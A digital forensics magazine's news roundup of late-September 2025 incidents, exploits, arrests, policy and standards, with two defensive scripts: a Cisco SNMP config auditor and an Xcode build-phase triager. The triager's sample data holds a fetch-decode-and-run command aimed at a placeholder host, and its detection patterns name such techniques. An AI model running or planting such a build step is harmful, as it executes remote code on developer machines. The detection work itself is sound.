Monday, September 29 2025
DFM News Roundup
Digital Forensics Magazine — 48h News Roundup
Window: 27-09-2025 00:00 to 29-09-2025 00:00 (UTC)

Snapshot Summary

| Sector / Section | Headline Highlights | Count |
| --- | --- | --- |
| DFIR & Incident Response | IR lessons learned; new macOS/Xcode malware variant; BRICKSTORM espionage ops | 3 |
| Cyber Investigations | UK arrest tied to airport disruption; INTERPOL sweeps romance-sextortion rings | 2 |
| Major Cyber Incidents | Harrods customer data breach; RTX confirms ransomware in airline passenger systems | 2 |
| Exploits & Threat Intelligence | Cisco SNMP zero-day exploited; NCSC warns of RayInitiator/LINE VIPER on Cisco | 3 |
| Law Enforcement | Airport cyber suspect arrested; Africa-wide INTERPOL arrests (260 suspects) | 2 |
| Policy | CISA issues emergency directive on Cisco zero-day; UK cyber growth plan released | 2 |
| Standards & Compliance | NIST SP 800-53 (Release 5.2.0) update; NIST PQC migration mapping white paper | 2 |

DFIR & Incident Response

CISA shares lessons learned from a recent federal IR engagement — CISA summarized containment, forensics, and recovery pitfalls observed during a real engagement to help teams harden playbooks (23-09-2025) [US]. Practical takeaways include early log preservation, rigorous account/credential review, and verifying egress controls before restore. (Source: CISA, 23-09-2025).

Microsoft tracks an updated XCSSET strain abusing Xcode projects — New activity shows macOS-targeting XCSSET evolving its developer-project infection chain, relevant for DFIR triage on Apple endpoints (24-09-2025) [Global]. Review build servers and Xcode project artifacts for rogue scripts and post-build steps. (Source: Microsoft Security Blog, 24-09-2025).
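The triage advice above (review Xcode project artifacts for rogue scripts and post-build steps) can be turned into a repeatable check. The script below is an added example written for this roundup, not Microsoft's tooling or any XCSSET indicator set: it assumes the standard project.pbxproj layout for PBXShellScriptBuildPhase objects, and both the sample project text and the indicator list are constructed for illustration.

```python
"""List and triage shell-script build phases in an Xcode project.pbxproj.

Added example (not Microsoft's or the magazine's code). It assumes the
standard pbxproj layout for PBXShellScriptBuildPhase objects; the sample
project text and the indicator list below are constructed assumptions.
"""
import re

# Constructed sample: one ordinary lint phase and one phase that fetches
# and runs remote content, the kind of post-build step worth a second look.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		A1B2C3 /* Lint */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "swiftlint lint --quiet\n";
		};
		D4E5F6 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "curl -s http://example.invalid/p | base64 -d > /tmp/.x && sh /tmp/.x\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

# One pbxproj object: "<hex id> /* name */ = { ... };"
OBJECT_RE = re.compile(
    r"(?P<id>[0-9A-F]{6,24}) /\* (?P<name>[^*]*) \*/ = \{(?P<body>.*?)\};", re.S)
# The quoted script body; backslash escapes are kept for _unescape().
SCRIPT_RE = re.compile(r'shellScript = "(?P<script>(?:[^"\\]|\\.)*)";')

# Assumed indicators: behaviours a build step rarely needs (review, not verdict).
INDICATORS = (
    (r"\b(?:curl|wget)\b", "fetches remote content"),
    (r"\bbase64\s+(?:-d|-D|--decode)\b", "decodes a base64 payload"),
    (r"\b(?:eval|osascript)\b", "evaluates generated code / AppleScript"),
    (r"(?:\||&&|;)\s*(?:sh|bash|zsh)\b", "hands output to a shell"),
    (r"/(?:var/)?tmp/", "stages files in a temp directory"),
)


def _unescape(s):
    """Resolve pbxproj string escapes (\\n, \\t, \\", \\\\)."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def parse_shell_script_phases(pbxproj_text):
    """Return every shell-script build phase as {id, name, script}."""
    phases = []
    for obj in OBJECT_RE.finditer(pbxproj_text):
        body = obj["body"]
        if not re.search(r"isa\s*=\s*PBXShellScriptBuildPhase\s*;", body):
            continue
        m = SCRIPT_RE.search(body)
        script = _unescape(m["script"]) if m else ""
        phases.append({"id": obj["id"], "name": obj["name"].strip(), "script": script})
    return phases


def flag_indicators(script):
    """Labels of every indicator pattern present in a script body."""
    return [label for pattern, label in INDICATORS if re.search(pattern, script)]


def triage(pbxproj_text):
    """Phases annotated with their indicator hits; empty list means nothing flagged."""
    return [dict(p, indicators=flag_indicators(p["script"]))
            for p in parse_shell_script_phases(pbxproj_text)]


if __name__ == "__main__":
    for p in triage(SAMPLE_PBXPROJ):
        status = "REVIEW" if p["indicators"] else "ok"
        print(f"{p['id']} {p['name']!r}: {status} {p['indicators']}")
```

Run it against each `project.pbxproj` under a build server's checkout (for example with `find . -name project.pbxproj`); any phase that lands in the REVIEW list is compared against the project's version-control history to see who added it and when.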

BRICKSTORM espionage campaign: stealthy backdoor for persistence — Google/Mandiant detail intrusions since March 2025 across legal/SaaS/BPO/tech sectors using a quiet backdoor to retain access (24-09-2025) [US]. DFIR teams should hunt for long-lived C2 beacons and unusual scheduled tasks to root out persistence. (Source: Google Threat Intelligence, 24-09-2025).

Cyber Investigations

NCA arrests suspect tied to Collins Aerospace software attack affecting airports — A man in his 40s was arrested in West Sussex after check-in/boarding systems disruption at Heathrow, Brussels, Berlin and others (24-09-2025) [UK/EU]. Investigators are probing links to a broader ransomware/extortion operation. (Source: UK NCA, 24-09-2025).

INTERPOL operation across 14 African countries nets 260 suspects — Arrests targeted romance scams and sextortion rings, with ~$2.8M in losses across 1,400+ victims (26-09-2025) [Africa]. Highlights the cross-border nature of digital coercion and the need for platform evidence preservation. (Source: AP News, 26-09-2025).

Major Cyber Incidents

Harrods notifies customers after third-party breach exposes contact data — Names and contact details were accessed at a service provider; payment data/passwords not impacted per statements (26-09-2025) [UK]. Retailers should reassess supplier data segregation and incident comms runbooks. (Source: The Guardian, 26-09-2025).

RTX confirms ransomware in passenger boarding software incident — Parent of Collins Aerospace said the event won’t materially impact results; disruptions hit airport ops over the weekend (26-09-2025) [US/EU]. Reinforces vendor risk around aviation ground-IT. (Source: Cybersecurity Dive, 26-09-2025).

Exploits & Threat Intelligence

Cisco SNMP stack overflow (CVE-2025-20352) actively exploited — Affected IOS/IOS-XE builds allow DoS and, with high privileges, code execution; patches released in the semiannual bundle (24-09-2025) [Global]. Prioritize SNMP hardening and software updates on network edge devices. (Source: Cisco PSIRT, 24-09-2025).
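Patching is the fix for the CVE; the "SNMP hardening" the item recommends is about limiting who can reach the SNMP stack in the meantime and afterwards. The script below is an added example written for this roundup, not Cisco's tooling: it audits a Cisco IOS/IOS-XE running-config excerpt for the usual weak spots (well-known community strings, read-write communities, communities without an ACL, SNMPv3 groups without privacy, v1/v2c trap targets). It assumes the standard `snmp-server community/group/host` line syntax, and the sample config and the list of weak community strings are constructed.

```python
"""Audit SNMP settings in a Cisco IOS/IOS-XE running-config excerpt.

Added example (not Cisco's or the magazine's code). It assumes the usual
IOS syntax for "snmp-server community/group/host" lines; the sample config
and WEAK_COMMUNITIES below are constructed. Patching fixes the CVE; this
check shows where exposure of the SNMP stack is wider than it needs to be.
"""
import re
from collections import Counter

# Constructed running-config excerpt with deliberate weak spots.
SAMPLE_CONFIG = """\
hostname edge-rtr-01
!
snmp-server community public RO
snmp-server community c0mplex!Str1ng RW
snmp-server community m0n1tor-only RO 10
snmp-server group NETMON v3 priv
snmp-server group LEGACY v3 noauth
snmp-server host 192.0.2.10 version 2c public
access-list 10 permit 192.0.2.0 0.0.0.255
"""

# Assumed list of community strings that are guessed first.
WEAK_COMMUNITIES = {"public", "private", "cisco", "admin", "snmp"}

# snmp-server community NAME [view V] [RO|RW] [ipv6 NACL] [ACL]
COMMUNITY_RE = re.compile(
    r"^snmp-server community (?P<name>\S+)"
    r"(?:\s+view\s+\S+)?"
    r"(?:\s+(?P<mode>RO|RW))?"
    r"(?:\s+ipv6\s+\S+)?"
    r"(?:\s+(?P<acl>\S+))?\s*$"
)
GROUP_RE = re.compile(r"^snmp-server group \S+ v3 (?P<level>noauth|auth|priv)\b")
HOST_RE = re.compile(r"^snmp-server host \S+(?:\s+\S+)*?\s+version (?P<ver>1|2c|3)\b")


def audit_snmp(config_text):
    """Return findings as dicts with severity, offending line and issue."""
    findings = []
    community_lines = 0
    for raw in config_text.splitlines():
        line = raw.strip()
        m = COMMUNITY_RE.match(line)
        if m:
            community_lines += 1
            name, mode, acl = m["name"], m["mode"] or "RO", m["acl"]  # RO is the IOS default
            if name.lower() in WEAK_COMMUNITIES:
                findings.append({"severity": "high", "line": line,
                                 "issue": "well-known community string"})
            if mode == "RW":
                findings.append({"severity": "high", "line": line,
                                 "issue": "read-write community allows configuration changes"})
            if acl is None:
                findings.append({"severity": "medium", "line": line,
                                 "issue": "no ACL restricts which sources may use this community"})
            continue
        m = GROUP_RE.match(line)
        if m and m["level"] != "priv":
            findings.append({"severity": "medium", "line": line,
                             "issue": f"SNMPv3 group without privacy ({m['level']}); use priv"})
            continue
        m = HOST_RE.match(line)
        if m and m["ver"] != "3":
            findings.append({"severity": "medium", "line": line,
                             "issue": f"trap/inform target uses SNMPv{m['ver']} (community sent in clear)"})
    if community_lines:
        findings.append({"severity": "info", "line": f"{community_lines} community line(s)",
                         "issue": "SNMPv1/v2c enabled; plan migration to SNMPv3 authPriv"})
    return findings


def summarize(findings):
    """Count findings per severity, e.g. {'high': 2, 'medium': 4, 'info': 1}."""
    return dict(Counter(f["severity"] for f in findings))


if __name__ == "__main__":
    results = audit_snmp(SAMPLE_CONFIG)
    for f in results:
        print(f"[{f['severity']:6}] {f['line']}\n         {f['issue']}")
    print(summarize(results))
```

Feed it the output of `show running-config | include snmp-server` from each device in the inventory; the `high` findings are the ones to fix before the patch window, and a clean run still leaves the `info` item (v1/v2c in use) as a migration task.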

CISA directs federal agencies to hunt for compromise on Cisco devices — US agencies must inventory devices, collect forensics, disconnect end-of-support units, and upgrade by deadlines (25-09-2025) [US]. Private sector can adapt the checklist to accelerate detection at scale. (Source: CISA Alert, 25-09-2025).

NCSC/industry flag RayInitiator & LINE VIPER malware on Cisco firewalls — Analysis links zero-day exploitation to custom bootkits/loaders on ASA devices, affecting their secure boot state (26-09-2025) [UK/Global]. Network teams should verify secure boot status and monitor for anomalous boot artifacts. (Source: Unit 42 summary of NCSC analysis, 26-09-2025).

Law Enforcement

UK arrest linked to airport disruption investigation — Following widespread airport IT outages, the NCA detained a suspect on Computer Misuse grounds; inquiries continue (24-09-2025) [UK/EU]. Case underscores aviation sector dependencies on third-party software. (Source: Cybersecurity Dive, 24-09-2025).

INTERPOL sweep: 260 arrests in romance-sextortion scams — Coordinated operations across 14 countries targeted online coercion and financial extortion (26-09-2025) [Africa]. Cross-border cooperation remains pivotal for evidence and takedowns. (Source: AP News, 26-09-2025).

Policy

CISA issues Emergency Directive on Cisco zero-day exposure — Federal agencies must inventory, collect evidence, disconnect EoS devices and upgrade by set deadlines (25-09-2025) [US]. ED elevates urgency for enterprises to mirror actions on similar fleets. (Source: CISA News, 25-09-2025).

UK “Cyber Growth Action Plan – Final Report” released — Report recommends expanding and resourcing the NCSC to drive resilience and growth outcomes (19-09-2025) [UK]. Signals continued UK focus on national cyber capacity-building. (Source: UK Government, 19-09-2025).

Standards & Compliance

NIST SP 800-53 Release 5.2.0 update (planning note 27-08-2025) — Minor release updates SP 800-53/53A; organizations should review control changes for ripple effects on overlays/baselines (27-08-2025) [US]. (Source: NIST CSRC, 27-08-2025).

NIST NCCoE: Draft white paper maps PQC migration to risk frameworks — CSWP-48 (initial public draft) aligns PQC migration capabilities with NIST risk docs; comments due Oct 20 (18-09-2025) [US]. (Source: NIST CSRC News, 18-09-2025).

Editorial Perspective

This 48-hour window shows a classic blend: active exploitation on core network gear, vendor-software outages cascading into aviation ops, and steady progress on compliance frameworks. As Cisco SNMP exploitation and custom bootkits hit the headlines, incident responders should double down on device inventory, secure boot verification, and rigorous credential hygiene.

Third-party risk persists: Harrods’ breach via a provider and the airline ground-IT disruption both underscore supplier segmentation, least-privilege access, and contractually mandated IR transparency. Treat vendor environments as extensions of your own attack surface, with equivalent logging and egress controls.

Policy and standards levers are turning in parallel—CISA’s Emergency Directive provides a ready-made hunt/contain blueprint; NIST updates signal where audits will look next. Use the urgency to accelerate patch governance, device lifecycle retirement, and tabletop exercises tuned to network-edge compromise.

Tags

DFIR, Cybersecurity News, Threat Intelligence, Ransomware, Law Enforcement, Cyber Policy, Compliance, EU CRA
